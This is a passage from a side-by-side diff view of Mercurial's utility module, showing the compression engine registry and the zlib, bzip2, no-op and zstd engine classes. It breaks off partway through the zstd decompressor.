3579 pos = path.rfind('/', 0, pos)
3587 pos = path.rfind('/', 0, pos)
3580
3588
3581 # compression code
3589 # compression code
3582
3590
3583 SERVERROLE = 'server'
3591 SERVERROLE = 'server'
3584 CLIENTROLE = 'client'
3592 CLIENTROLE = 'client'
3585
3593
3586 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3594 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3587 (u'name', u'serverpriority',
3595 (u'name', u'serverpriority',
3588 u'clientpriority'))
3596 u'clientpriority'))
3589
3597
3590 class compressormanager(object):
3598 class compressormanager(object):
3591 """Holds registrations of various compression engines.
3599 """Holds registrations of various compression engines.
3592
3600
3593 This class essentially abstracts the differences between compression
3601 This class essentially abstracts the differences between compression
3594 engines to allow new compression formats to be added easily, possibly from
3602 engines to allow new compression formats to be added easily, possibly from
3595 extensions.
3603 extensions.
3596
3604
3597 Compressors are registered against the global instance by calling its
3605 Compressors are registered against the global instance by calling its
3598 ``register()`` method.
3606 ``register()`` method.
3599 """
3607 """
3600 def __init__(self):
3608 def __init__(self):
3601 self._engines = {}
3609 self._engines = {}
3602 # Bundle spec human name to engine name.
3610 # Bundle spec human name to engine name.
3603 self._bundlenames = {}
3611 self._bundlenames = {}
3604 # Internal bundle identifier to engine name.
3612 # Internal bundle identifier to engine name.
3605 self._bundletypes = {}
3613 self._bundletypes = {}
3606 # Revlog header to engine name.
3614 # Revlog header to engine name.
3607 self._revlogheaders = {}
3615 self._revlogheaders = {}
3608 # Wire proto identifier to engine name.
3616 # Wire proto identifier to engine name.
3609 self._wiretypes = {}
3617 self._wiretypes = {}
3610
3618
3611 def __getitem__(self, key):
3619 def __getitem__(self, key):
3612 return self._engines[key]
3620 return self._engines[key]
3613
3621
3614 def __contains__(self, key):
3622 def __contains__(self, key):
3615 return key in self._engines
3623 return key in self._engines
3616
3624
3617 def __iter__(self):
3625 def __iter__(self):
3618 return iter(self._engines.keys())
3626 return iter(self._engines.keys())
3619
3627
3620 def register(self, engine):
3628 def register(self, engine):
3621 """Register a compression engine with the manager.
3629 """Register a compression engine with the manager.
3622
3630
3623 The argument must be a ``compressionengine`` instance.
3631 The argument must be a ``compressionengine`` instance.
3624 """
3632 """
3625 if not isinstance(engine, compressionengine):
3633 if not isinstance(engine, compressionengine):
3626 raise ValueError(_('argument must be a compressionengine'))
3634 raise ValueError(_('argument must be a compressionengine'))
3627
3635
3628 name = engine.name()
3636 name = engine.name()
3629
3637
3630 if name in self._engines:
3638 if name in self._engines:
3631 raise error.Abort(_('compression engine %s already registered') %
3639 raise error.Abort(_('compression engine %s already registered') %
3632 name)
3640 name)
3633
3641
3634 bundleinfo = engine.bundletype()
3642 bundleinfo = engine.bundletype()
3635 if bundleinfo:
3643 if bundleinfo:
3636 bundlename, bundletype = bundleinfo
3644 bundlename, bundletype = bundleinfo
3637
3645
3638 if bundlename in self._bundlenames:
3646 if bundlename in self._bundlenames:
3639 raise error.Abort(_('bundle name %s already registered') %
3647 raise error.Abort(_('bundle name %s already registered') %
3640 bundlename)
3648 bundlename)
3641 if bundletype in self._bundletypes:
3649 if bundletype in self._bundletypes:
3642 raise error.Abort(_('bundle type %s already registered by %s') %
3650 raise error.Abort(_('bundle type %s already registered by %s') %
3643 (bundletype, self._bundletypes[bundletype]))
3651 (bundletype, self._bundletypes[bundletype]))
3644
3652
3645 # No external facing name declared.
3653 # No external facing name declared.
3646 if bundlename:
3654 if bundlename:
3647 self._bundlenames[bundlename] = name
3655 self._bundlenames[bundlename] = name
3648
3656
3649 self._bundletypes[bundletype] = name
3657 self._bundletypes[bundletype] = name
3650
3658
3651 wiresupport = engine.wireprotosupport()
3659 wiresupport = engine.wireprotosupport()
3652 if wiresupport:
3660 if wiresupport:
3653 wiretype = wiresupport.name
3661 wiretype = wiresupport.name
3654 if wiretype in self._wiretypes:
3662 if wiretype in self._wiretypes:
3655 raise error.Abort(_('wire protocol compression %s already '
3663 raise error.Abort(_('wire protocol compression %s already '
3656 'registered by %s') %
3664 'registered by %s') %
3657 (wiretype, self._wiretypes[wiretype]))
3665 (wiretype, self._wiretypes[wiretype]))
3658
3666
3659 self._wiretypes[wiretype] = name
3667 self._wiretypes[wiretype] = name
3660
3668
3661 revlogheader = engine.revlogheader()
3669 revlogheader = engine.revlogheader()
3662 if revlogheader and revlogheader in self._revlogheaders:
3670 if revlogheader and revlogheader in self._revlogheaders:
3663 raise error.Abort(_('revlog header %s already registered by %s') %
3671 raise error.Abort(_('revlog header %s already registered by %s') %
3664 (revlogheader, self._revlogheaders[revlogheader]))
3672 (revlogheader, self._revlogheaders[revlogheader]))
3665
3673
3666 if revlogheader:
3674 if revlogheader:
3667 self._revlogheaders[revlogheader] = name
3675 self._revlogheaders[revlogheader] = name
3668
3676
3669 self._engines[name] = engine
3677 self._engines[name] = engine
3670
3678
3671 @property
3679 @property
3672 def supportedbundlenames(self):
3680 def supportedbundlenames(self):
3673 return set(self._bundlenames.keys())
3681 return set(self._bundlenames.keys())
3674
3682
3675 @property
3683 @property
3676 def supportedbundletypes(self):
3684 def supportedbundletypes(self):
3677 return set(self._bundletypes.keys())
3685 return set(self._bundletypes.keys())
3678
3686
3679 def forbundlename(self, bundlename):
3687 def forbundlename(self, bundlename):
3680 """Obtain a compression engine registered to a bundle name.
3688 """Obtain a compression engine registered to a bundle name.
3681
3689
3682 Will raise KeyError if the bundle type isn't registered.
3690 Will raise KeyError if the bundle type isn't registered.
3683
3691
3684 Will abort if the engine is known but not available.
3692 Will abort if the engine is known but not available.
3685 """
3693 """
3686 engine = self._engines[self._bundlenames[bundlename]]
3694 engine = self._engines[self._bundlenames[bundlename]]
3687 if not engine.available():
3695 if not engine.available():
3688 raise error.Abort(_('compression engine %s could not be loaded') %
3696 raise error.Abort(_('compression engine %s could not be loaded') %
3689 engine.name())
3697 engine.name())
3690 return engine
3698 return engine
3691
3699
3692 def forbundletype(self, bundletype):
3700 def forbundletype(self, bundletype):
3693 """Obtain a compression engine registered to a bundle type.
3701 """Obtain a compression engine registered to a bundle type.
3694
3702
3695 Will raise KeyError if the bundle type isn't registered.
3703 Will raise KeyError if the bundle type isn't registered.
3696
3704
3697 Will abort if the engine is known but not available.
3705 Will abort if the engine is known but not available.
3698 """
3706 """
3699 engine = self._engines[self._bundletypes[bundletype]]
3707 engine = self._engines[self._bundletypes[bundletype]]
3700 if not engine.available():
3708 if not engine.available():
3701 raise error.Abort(_('compression engine %s could not be loaded') %
3709 raise error.Abort(_('compression engine %s could not be loaded') %
3702 engine.name())
3710 engine.name())
3703 return engine
3711 return engine
3704
3712
3705 def supportedwireengines(self, role, onlyavailable=True):
3713 def supportedwireengines(self, role, onlyavailable=True):
3706 """Obtain compression engines that support the wire protocol.
3714 """Obtain compression engines that support the wire protocol.
3707
3715
3708 Returns a list of engines in prioritized order, most desired first.
3716 Returns a list of engines in prioritized order, most desired first.
3709
3717
3710 If ``onlyavailable`` is set, filter out engines that can't be
3718 If ``onlyavailable`` is set, filter out engines that can't be
3711 loaded.
3719 loaded.
3712 """
3720 """
3713 assert role in (SERVERROLE, CLIENTROLE)
3721 assert role in (SERVERROLE, CLIENTROLE)
3714
3722
3715 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3723 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3716
3724
3717 engines = [self._engines[e] for e in self._wiretypes.values()]
3725 engines = [self._engines[e] for e in self._wiretypes.values()]
3718 if onlyavailable:
3726 if onlyavailable:
3719 engines = [e for e in engines if e.available()]
3727 engines = [e for e in engines if e.available()]
3720
3728
3721 def getkey(e):
3729 def getkey(e):
3722 # Sort first by priority, highest first. In case of tie, sort
3730 # Sort first by priority, highest first. In case of tie, sort
3723 # alphabetically. This is arbitrary, but ensures output is
3731 # alphabetically. This is arbitrary, but ensures output is
3724 # stable.
3732 # stable.
3725 w = e.wireprotosupport()
3733 w = e.wireprotosupport()
3726 return -1 * getattr(w, attr), w.name
3734 return -1 * getattr(w, attr), w.name
3727
3735
3728 return list(sorted(engines, key=getkey))
3736 return list(sorted(engines, key=getkey))
3729
3737
3730 def forwiretype(self, wiretype):
3738 def forwiretype(self, wiretype):
3731 engine = self._engines[self._wiretypes[wiretype]]
3739 engine = self._engines[self._wiretypes[wiretype]]
3732 if not engine.available():
3740 if not engine.available():
3733 raise error.Abort(_('compression engine %s could not be loaded') %
3741 raise error.Abort(_('compression engine %s could not be loaded') %
3734 engine.name())
3742 engine.name())
3735 return engine
3743 return engine
3736
3744
3737 def forrevlogheader(self, header):
3745 def forrevlogheader(self, header):
3738 """Obtain a compression engine registered to a revlog header.
3746 """Obtain a compression engine registered to a revlog header.
3739
3747
3740 Will raise KeyError if the revlog header value isn't registered.
3748 Will raise KeyError if the revlog header value isn't registered.
3741 """
3749 """
3742 return self._engines[self._revlogheaders[header]]
3750 return self._engines[self._revlogheaders[header]]
3743
3751
3744 compengines = compressormanager()
3752 compengines = compressormanager()
3745
3753
3746 class compressionengine(object):
3754 class compressionengine(object):
3747 """Base class for compression engines.
3755 """Base class for compression engines.
3748
3756
3749 Compression engines must implement the interface defined by this class.
3757 Compression engines must implement the interface defined by this class.
3750 """
3758 """
3751 def name(self):
3759 def name(self):
3752 """Returns the name of the compression engine.
3760 """Returns the name of the compression engine.
3753
3761
3754 This is the key the engine is registered under.
3762 This is the key the engine is registered under.
3755
3763
3756 This method must be implemented.
3764 This method must be implemented.
3757 """
3765 """
3758 raise NotImplementedError()
3766 raise NotImplementedError()
3759
3767
3760 def available(self):
3768 def available(self):
3761 """Whether the compression engine is available.
3769 """Whether the compression engine is available.
3762
3770
3763 The intent of this method is to allow optional compression engines
3771 The intent of this method is to allow optional compression engines
3764 that may not be available in all installations (such as engines relying
3772 that may not be available in all installations (such as engines relying
3765 on C extensions that may not be present).
3773 on C extensions that may not be present).
3766 """
3774 """
3767 return True
3775 return True
3768
3776
3769 def bundletype(self):
3777 def bundletype(self):
3770 """Describes bundle identifiers for this engine.
3778 """Describes bundle identifiers for this engine.
3771
3779
3772 If this compression engine isn't supported for bundles, returns None.
3780 If this compression engine isn't supported for bundles, returns None.
3773
3781
3774 If this engine can be used for bundles, returns a 2-tuple of strings of
3782 If this engine can be used for bundles, returns a 2-tuple of strings of
3775 the user-facing "bundle spec" compression name and an internal
3783 the user-facing "bundle spec" compression name and an internal
3776 identifier used to denote the compression format within bundles. To
3784 identifier used to denote the compression format within bundles. To
3777 exclude the name from external usage, set the first element to ``None``.
3785 exclude the name from external usage, set the first element to ``None``.
3778
3786
3779 If bundle compression is supported, the class must also implement
3787 If bundle compression is supported, the class must also implement
3780 ``compressstream`` and `decompressorreader``.
3788 ``compressstream`` and `decompressorreader``.
3781
3789
3782 The docstring of this method is used in the help system to tell users
3790 The docstring of this method is used in the help system to tell users
3783 about this engine.
3791 about this engine.
3784 """
3792 """
3785 return None
3793 return None
3786
3794
3787 def wireprotosupport(self):
3795 def wireprotosupport(self):
3788 """Declare support for this compression format on the wire protocol.
3796 """Declare support for this compression format on the wire protocol.
3789
3797
3790 If this compression engine isn't supported for compressing wire
3798 If this compression engine isn't supported for compressing wire
3791 protocol payloads, returns None.
3799 protocol payloads, returns None.
3792
3800
3793 Otherwise, returns ``compenginewireprotosupport`` with the following
3801 Otherwise, returns ``compenginewireprotosupport`` with the following
3794 fields:
3802 fields:
3795
3803
3796 * String format identifier
3804 * String format identifier
3797 * Integer priority for the server
3805 * Integer priority for the server
3798 * Integer priority for the client
3806 * Integer priority for the client
3799
3807
3800 The integer priorities are used to order the advertisement of format
3808 The integer priorities are used to order the advertisement of format
3801 support by server and client. The highest integer is advertised
3809 support by server and client. The highest integer is advertised
3802 first. Integers with non-positive values aren't advertised.
3810 first. Integers with non-positive values aren't advertised.
3803
3811
3804 The priority values are somewhat arbitrary and only used for default
3812 The priority values are somewhat arbitrary and only used for default
3805 ordering. The relative order can be changed via config options.
3813 ordering. The relative order can be changed via config options.
3806
3814
3807 If wire protocol compression is supported, the class must also implement
3815 If wire protocol compression is supported, the class must also implement
3808 ``compressstream`` and ``decompressorreader``.
3816 ``compressstream`` and ``decompressorreader``.
3809 """
3817 """
3810 return None
3818 return None
3811
3819
3812 def revlogheader(self):
3820 def revlogheader(self):
3813 """Header added to revlog chunks that identifies this engine.
3821 """Header added to revlog chunks that identifies this engine.
3814
3822
3815 If this engine can be used to compress revlogs, this method should
3823 If this engine can be used to compress revlogs, this method should
3816 return the bytes used to identify chunks compressed with this engine.
3824 return the bytes used to identify chunks compressed with this engine.
3817 Else, the method should return ``None`` to indicate it does not
3825 Else, the method should return ``None`` to indicate it does not
3818 participate in revlog compression.
3826 participate in revlog compression.
3819 """
3827 """
3820 return None
3828 return None
3821
3829
3822 def compressstream(self, it, opts=None):
3830 def compressstream(self, it, opts=None):
3823 """Compress an iterator of chunks.
3831 """Compress an iterator of chunks.
3824
3832
3825 The method receives an iterator (ideally a generator) of chunks of
3833 The method receives an iterator (ideally a generator) of chunks of
3826 bytes to be compressed. It returns an iterator (ideally a generator)
3834 bytes to be compressed. It returns an iterator (ideally a generator)
3827 of bytes of chunks representing the compressed output.
3835 of bytes of chunks representing the compressed output.
3828
3836
3829 Optionally accepts an argument defining how to perform compression.
3837 Optionally accepts an argument defining how to perform compression.
3830 Each engine treats this argument differently.
3838 Each engine treats this argument differently.
3831 """
3839 """
3832 raise NotImplementedError()
3840 raise NotImplementedError()
3833
3841
3834 def decompressorreader(self, fh):
3842 def decompressorreader(self, fh):
3835 """Perform decompression on a file object.
3843 """Perform decompression on a file object.
3836
3844
3837 Argument is an object with a ``read(size)`` method that returns
3845 Argument is an object with a ``read(size)`` method that returns
3838 compressed data. Return value is an object with a ``read(size)`` that
3846 compressed data. Return value is an object with a ``read(size)`` that
3839 returns uncompressed data.
3847 returns uncompressed data.
3840 """
3848 """
3841 raise NotImplementedError()
3849 raise NotImplementedError()
3842
3850
3843 def revlogcompressor(self, opts=None):
3851 def revlogcompressor(self, opts=None):
3844 """Obtain an object that can be used to compress revlog entries.
3852 """Obtain an object that can be used to compress revlog entries.
3845
3853
3846 The object has a ``compress(data)`` method that compresses binary
3854 The object has a ``compress(data)`` method that compresses binary
3847 data. This method returns compressed binary data or ``None`` if
3855 data. This method returns compressed binary data or ``None`` if
3848 the data could not be compressed (too small, not compressible, etc).
3856 the data could not be compressed (too small, not compressible, etc).
3849 The returned data should have a header uniquely identifying this
3857 The returned data should have a header uniquely identifying this
3850 compression format so decompression can be routed to this engine.
3858 compression format so decompression can be routed to this engine.
3851 This header should be identified by the ``revlogheader()`` return
3859 This header should be identified by the ``revlogheader()`` return
3852 value.
3860 value.
3853
3861
3854 The object has a ``decompress(data)`` method that decompresses
3862 The object has a ``decompress(data)`` method that decompresses
3855 data. The method will only be called if ``data`` begins with
3863 data. The method will only be called if ``data`` begins with
3856 ``revlogheader()``. The method should return the raw, uncompressed
3864 ``revlogheader()``. The method should return the raw, uncompressed
3857 data or raise a ``RevlogError``.
3865 data or raise a ``RevlogError``.
3858
3866
3859 The object is reusable but is not thread safe.
3867 The object is reusable but is not thread safe.
3860 """
3868 """
3861 raise NotImplementedError()
3869 raise NotImplementedError()
3862
3870
3863 class _zlibengine(compressionengine):
3871 class _zlibengine(compressionengine):
3864 def name(self):
3872 def name(self):
3865 return 'zlib'
3873 return 'zlib'
3866
3874
3867 def bundletype(self):
3875 def bundletype(self):
3868 """zlib compression using the DEFLATE algorithm.
3876 """zlib compression using the DEFLATE algorithm.
3869
3877
3870 All Mercurial clients should support this format. The compression
3878 All Mercurial clients should support this format. The compression
3871 algorithm strikes a reasonable balance between compression ratio
3879 algorithm strikes a reasonable balance between compression ratio
3872 and size.
3880 and size.
3873 """
3881 """
3874 return 'gzip', 'GZ'
3882 return 'gzip', 'GZ'
3875
3883
3876 def wireprotosupport(self):
3884 def wireprotosupport(self):
3877 return compewireprotosupport('zlib', 20, 20)
3885 return compewireprotosupport('zlib', 20, 20)
3878
3886
3879 def revlogheader(self):
3887 def revlogheader(self):
3880 return 'x'
3888 return 'x'
3881
3889
3882 def compressstream(self, it, opts=None):
3890 def compressstream(self, it, opts=None):
3883 opts = opts or {}
3891 opts = opts or {}
3884
3892
3885 z = zlib.compressobj(opts.get('level', -1))
3893 z = zlib.compressobj(opts.get('level', -1))
3886 for chunk in it:
3894 for chunk in it:
3887 data = z.compress(chunk)
3895 data = z.compress(chunk)
3888 # Not all calls to compress emit data. It is cheaper to inspect
3896 # Not all calls to compress emit data. It is cheaper to inspect
3889 # here than to feed empty chunks through generator.
3897 # here than to feed empty chunks through generator.
3890 if data:
3898 if data:
3891 yield data
3899 yield data
3892
3900
3893 yield z.flush()
3901 yield z.flush()
3894
3902
3895 def decompressorreader(self, fh):
3903 def decompressorreader(self, fh):
3896 def gen():
3904 def gen():
3897 d = zlib.decompressobj()
3905 d = zlib.decompressobj()
3898 for chunk in filechunkiter(fh):
3906 for chunk in filechunkiter(fh):
3899 while chunk:
3907 while chunk:
3900 # Limit output size to limit memory.
3908 # Limit output size to limit memory.
3901 yield d.decompress(chunk, 2 ** 18)
3909 yield d.decompress(chunk, 2 ** 18)
3902 chunk = d.unconsumed_tail
3910 chunk = d.unconsumed_tail
3903
3911
3904 return chunkbuffer(gen())
3912 return chunkbuffer(gen())
3905
3913
3906 class zlibrevlogcompressor(object):
3914 class zlibrevlogcompressor(object):
3907 def compress(self, data):
3915 def compress(self, data):
3908 insize = len(data)
3916 insize = len(data)
3909 # Caller handles empty input case.
3917 # Caller handles empty input case.
3910 assert insize > 0
3918 assert insize > 0
3911
3919
3912 if insize < 44:
3920 if insize < 44:
3913 return None
3921 return None
3914
3922
3915 elif insize <= 1000000:
3923 elif insize <= 1000000:
3916 compressed = zlib.compress(data)
3924 compressed = zlib.compress(data)
3917 if len(compressed) < insize:
3925 if len(compressed) < insize:
3918 return compressed
3926 return compressed
3919 return None
3927 return None
3920
3928
3921 # zlib makes an internal copy of the input buffer, doubling
3929 # zlib makes an internal copy of the input buffer, doubling
3922 # memory usage for large inputs. So do streaming compression
3930 # memory usage for large inputs. So do streaming compression
3923 # on large inputs.
3931 # on large inputs.
3924 else:
3932 else:
3925 z = zlib.compressobj()
3933 z = zlib.compressobj()
3926 parts = []
3934 parts = []
3927 pos = 0
3935 pos = 0
3928 while pos < insize:
3936 while pos < insize:
3929 pos2 = pos + 2**20
3937 pos2 = pos + 2**20
3930 parts.append(z.compress(data[pos:pos2]))
3938 parts.append(z.compress(data[pos:pos2]))
3931 pos = pos2
3939 pos = pos2
3932 parts.append(z.flush())
3940 parts.append(z.flush())
3933
3941
3934 if sum(map(len, parts)) < insize:
3942 if sum(map(len, parts)) < insize:
3935 return ''.join(parts)
3943 return ''.join(parts)
3936 return None
3944 return None
3937
3945
3938 def decompress(self, data):
3946 def decompress(self, data):
3939 try:
3947 try:
3940 return zlib.decompress(data)
3948 return zlib.decompress(data)
3941 except zlib.error as e:
3949 except zlib.error as e:
3942 raise error.RevlogError(_('revlog decompress error: %s') %
3950 raise error.RevlogError(_('revlog decompress error: %s') %
3943 forcebytestr(e))
3951 forcebytestr(e))
3944
3952
3945 def revlogcompressor(self, opts=None):
3953 def revlogcompressor(self, opts=None):
3946 return self.zlibrevlogcompressor()
3954 return self.zlibrevlogcompressor()
3947
3955
3948 compengines.register(_zlibengine())
3956 compengines.register(_zlibengine())
3949
3957
3950 class _bz2engine(compressionengine):
3958 class _bz2engine(compressionengine):
3951 def name(self):
3959 def name(self):
3952 return 'bz2'
3960 return 'bz2'
3953
3961
3954 def bundletype(self):
3962 def bundletype(self):
3955 """An algorithm that produces smaller bundles than ``gzip``.
3963 """An algorithm that produces smaller bundles than ``gzip``.
3956
3964
3957 All Mercurial clients should support this format.
3965 All Mercurial clients should support this format.
3958
3966
3959 This engine will likely produce smaller bundles than ``gzip`` but
3967 This engine will likely produce smaller bundles than ``gzip`` but
3960 will be significantly slower, both during compression and
3968 will be significantly slower, both during compression and
3961 decompression.
3969 decompression.
3962
3970
3963 If available, the ``zstd`` engine can yield similar or better
3971 If available, the ``zstd`` engine can yield similar or better
3964 compression at much higher speeds.
3972 compression at much higher speeds.
3965 """
3973 """
3966 return 'bzip2', 'BZ'
3974 return 'bzip2', 'BZ'
3967
3975
3968 # We declare a protocol name but don't advertise by default because
3976 # We declare a protocol name but don't advertise by default because
3969 # it is slow.
3977 # it is slow.
3970 def wireprotosupport(self):
3978 def wireprotosupport(self):
3971 return compewireprotosupport('bzip2', 0, 0)
3979 return compewireprotosupport('bzip2', 0, 0)
3972
3980
3973 def compressstream(self, it, opts=None):
3981 def compressstream(self, it, opts=None):
3974 opts = opts or {}
3982 opts = opts or {}
3975 z = bz2.BZ2Compressor(opts.get('level', 9))
3983 z = bz2.BZ2Compressor(opts.get('level', 9))
3976 for chunk in it:
3984 for chunk in it:
3977 data = z.compress(chunk)
3985 data = z.compress(chunk)
3978 if data:
3986 if data:
3979 yield data
3987 yield data
3980
3988
3981 yield z.flush()
3989 yield z.flush()
3982
3990
3983 def decompressorreader(self, fh):
3991 def decompressorreader(self, fh):
3984 def gen():
3992 def gen():
3985 d = bz2.BZ2Decompressor()
3993 d = bz2.BZ2Decompressor()
3986 for chunk in filechunkiter(fh):
3994 for chunk in filechunkiter(fh):
3987 yield d.decompress(chunk)
3995 yield d.decompress(chunk)
3988
3996
3989 return chunkbuffer(gen())
3997 return chunkbuffer(gen())
3990
3998
3991 compengines.register(_bz2engine())
3999 compengines.register(_bz2engine())
3992
4000
3993 class _truncatedbz2engine(compressionengine):
4001 class _truncatedbz2engine(compressionengine):
3994 def name(self):
4002 def name(self):
3995 return 'bz2truncated'
4003 return 'bz2truncated'
3996
4004
3997 def bundletype(self):
4005 def bundletype(self):
3998 return None, '_truncatedBZ'
4006 return None, '_truncatedBZ'
3999
4007
4000 # We don't implement compressstream because it is hackily handled elsewhere.
4008 # We don't implement compressstream because it is hackily handled elsewhere.
4001
4009
4002 def decompressorreader(self, fh):
4010 def decompressorreader(self, fh):
4003 def gen():
4011 def gen():
4004 # The input stream doesn't have the 'BZ' header. So add it back.
4012 # The input stream doesn't have the 'BZ' header. So add it back.
4005 d = bz2.BZ2Decompressor()
4013 d = bz2.BZ2Decompressor()
4006 d.decompress('BZ')
4014 d.decompress('BZ')
4007 for chunk in filechunkiter(fh):
4015 for chunk in filechunkiter(fh):
4008 yield d.decompress(chunk)
4016 yield d.decompress(chunk)
4009
4017
4010 return chunkbuffer(gen())
4018 return chunkbuffer(gen())
4011
4019
4012 compengines.register(_truncatedbz2engine())
4020 compengines.register(_truncatedbz2engine())
4013
4021
4014 class _noopengine(compressionengine):
4022 class _noopengine(compressionengine):
4015 def name(self):
4023 def name(self):
4016 return 'none'
4024 return 'none'
4017
4025
4018 def bundletype(self):
4026 def bundletype(self):
4019 """No compression is performed.
4027 """No compression is performed.
4020
4028
4021 Use this compression engine to explicitly disable compression.
4029 Use this compression engine to explicitly disable compression.
4022 """
4030 """
4023 return 'none', 'UN'
4031 return 'none', 'UN'
4024
4032
4025 # Clients always support uncompressed payloads. Servers don't because
4033 # Clients always support uncompressed payloads. Servers don't because
4026 # unless you are on a fast network, uncompressed payloads can easily
4034 # unless you are on a fast network, uncompressed payloads can easily
4027 # saturate your network pipe.
4035 # saturate your network pipe.
4028 def wireprotosupport(self):
4036 def wireprotosupport(self):
4029 return compewireprotosupport('none', 0, 10)
4037 return compewireprotosupport('none', 0, 10)
4030
4038
4031 # We don't implement revlogheader because it is handled specially
4039 # We don't implement revlogheader because it is handled specially
4032 # in the revlog class.
4040 # in the revlog class.
4033
4041
4034 def compressstream(self, it, opts=None):
4042 def compressstream(self, it, opts=None):
4035 return it
4043 return it
4036
4044
4037 def decompressorreader(self, fh):
4045 def decompressorreader(self, fh):
4038 return fh
4046 return fh
4039
4047
4040 class nooprevlogcompressor(object):
4048 class nooprevlogcompressor(object):
4041 def compress(self, data):
4049 def compress(self, data):
4042 return None
4050 return None
4043
4051
4044 def revlogcompressor(self, opts=None):
4052 def revlogcompressor(self, opts=None):
4045 return self.nooprevlogcompressor()
4053 return self.nooprevlogcompressor()
4046
4054
4047 compengines.register(_noopengine())
4055 compengines.register(_noopengine())
4048
4056
4049 class _zstdengine(compressionengine):
4057 class _zstdengine(compressionengine):
4050 def name(self):
4058 def name(self):
4051 return 'zstd'
4059 return 'zstd'
4052
4060
4053 @propertycache
4061 @propertycache
4054 def _module(self):
4062 def _module(self):
4055 # Not all installs have the zstd module available. So defer importing
4063 # Not all installs have the zstd module available. So defer importing
4056 # until first access.
4064 # until first access.
4057 try:
4065 try:
4058 from . import zstd
4066 from . import zstd
4059 # Force delayed import.
4067 # Force delayed import.
4060 zstd.__version__
4068 zstd.__version__
4061 return zstd
4069 return zstd
4062 except ImportError:
4070 except ImportError:
4063 return None
4071 return None
4064
4072
4065 def available(self):
4073 def available(self):
4066 return bool(self._module)
4074 return bool(self._module)
4067
4075
4068 def bundletype(self):
4076 def bundletype(self):
4069 """A modern compression algorithm that is fast and highly flexible.
4077 """A modern compression algorithm that is fast and highly flexible.
4070
4078
4071 Only supported by Mercurial 4.1 and newer clients.
4079 Only supported by Mercurial 4.1 and newer clients.
4072
4080
4073 With the default settings, zstd compression is both faster and yields
4081 With the default settings, zstd compression is both faster and yields
4074 better compression than ``gzip``. It also frequently yields better
4082 better compression than ``gzip``. It also frequently yields better
4075 compression than ``bzip2`` while operating at much higher speeds.
4083 compression than ``bzip2`` while operating at much higher speeds.
4076
4084
4077 If this engine is available and backwards compatibility is not a
4085 If this engine is available and backwards compatibility is not a
4078 concern, it is likely the best available engine.
4086 concern, it is likely the best available engine.
4079 """
4087 """
4080 return 'zstd', 'ZS'
4088 return 'zstd', 'ZS'
4081
4089
4082 def wireprotosupport(self):
4090 def wireprotosupport(self):
4083 return compewireprotosupport('zstd', 50, 50)
4091 return compewireprotosupport('zstd', 50, 50)
4084
4092
4085 def revlogheader(self):
4093 def revlogheader(self):
4086 return '\x28'
4094 return '\x28'
4087
4095
4088 def compressstream(self, it, opts=None):
4096 def compressstream(self, it, opts=None):
4089 opts = opts or {}
4097 opts = opts or {}
4090 # zstd level 3 is almost always significantly faster than zlib
4098 # zstd level 3 is almost always significantly faster than zlib
4091 # while providing no worse compression. It strikes a good balance
4099 # while providing no worse compression. It strikes a good balance
4092 # between speed and compression.
4100 # between speed and compression.
4093 level = opts.get('level', 3)
4101 level = opts.get('level', 3)
4094
4102
4095 zstd = self._module
4103 zstd = self._module
4096 z = zstd.ZstdCompressor(level=level).compressobj()
4104 z = zstd.ZstdCompressor(level=level).compressobj()
4097 for chunk in it:
4105 for chunk in it:
4098 data = z.compress(chunk)
4106 data = z.compress(chunk)
4099 if data:
4107 if data:
4100 yield data
4108 yield data
4101
4109
4102 yield z.flush()
4110 yield z.flush()
4103
4111
4104 def decompressorreader(self, fh):
4112 def decompressorreader(self, fh):
4105 zstd = self._module
4113 zstd = self._module
4106 dctx = zstd.ZstdDecompressor()
4114 dctx = zstd.ZstdDecompressor()
4107 return chunkbuffer(dctx.read_from(fh))
4115 return chunkbuffer(dctx.read_from(fh))
4108
4116
4109 class zstdrevlogcompressor(object):
4117 class zstdrevlogcompressor(object):
4110 def __init__(self, zstd, level=3):
4118 def __init__(self, zstd, level=3):
4111 # Writing the content size adds a few bytes to the output. However,
4119 # Writing the content size adds a few bytes to the output. However,
4112 # it allows decompression to be more optimal since we can
4120 # it allows decompression to be more optimal since we can
4113 # pre-allocate a buffer to hold the result.
4121 # pre-allocate a buffer to hold the result.
4114 self._cctx = zstd.ZstdCompressor(level=level,
4122 self._cctx = zstd.ZstdCompressor(level=level,
4115 write_content_size=True)
4123 write_content_size=True)
4116 self._dctx = zstd.ZstdDecompressor()
4124 self._dctx = zstd.ZstdDecompressor()
4117 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4125 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
4118 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4126 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
4119
4127
4120 def compress(self, data):
4128 def compress(self, data):
4121 insize = len(data)
4129 insize = len(data)
4122 # Caller handles empty input case.
4130 # Caller handles empty input case.
4123 assert insize > 0
4131 assert insize > 0
4124
4132
4125 if insize < 50:
4133 if insize < 50:
4126 return None
4134 return None
4127
4135
4128 elif insize <= 1000000:
4136 elif insize <= 1000000:
4129 compressed = self._cctx.compress(data)
4137 compressed = self._cctx.compress(data)
4130 if len(compressed) < insize:
4138 if len(compressed) < insize:
4131 return compressed
4139 return compressed
4132 return None
4140 return None
4133 else:
4141 else:
4134 z = self._cctx.compressobj()
4142 z = self._cctx.compressobj()
4135 chunks = []
4143 chunks = []
4136 pos = 0
4144 pos = 0
4137 while pos < insize:
4145 while pos < insize:
4138 pos2 = pos + self._compinsize
4146 pos2 = pos + self._compinsize
4139 chunk = z.compress(data[pos:pos2])
4147 chunk = z.compress(data[pos:pos2])
4140 if chunk:
4148 if chunk:
4141 chunks.append(chunk)
4149 chunks.append(chunk)
4142 pos = pos2
4150 pos = pos2
4143 chunks.append(z.flush())
4151 chunks.append(z.flush())
4144
4152
4145 if sum(map(len, chunks)) < insize:
4153 if sum(map(len, chunks)) < insize:
4146 return ''.join(chunks)
4154 return ''.join(chunks)
4147 return None
4155 return None
4148
4156
4149 def decompress(self, data):
4157 def decompress(self, data):
4150 insize = len(data)
4158 insize = len(data)
4151
4159
4152 try:
4160 try:
4153 # This was measured to be faster than other streaming
4161 # This was measured to be faster than other streaming
4154 # decompressors.
4162 # decompressors.
4155 dobj = self._dctx.decompressobj()
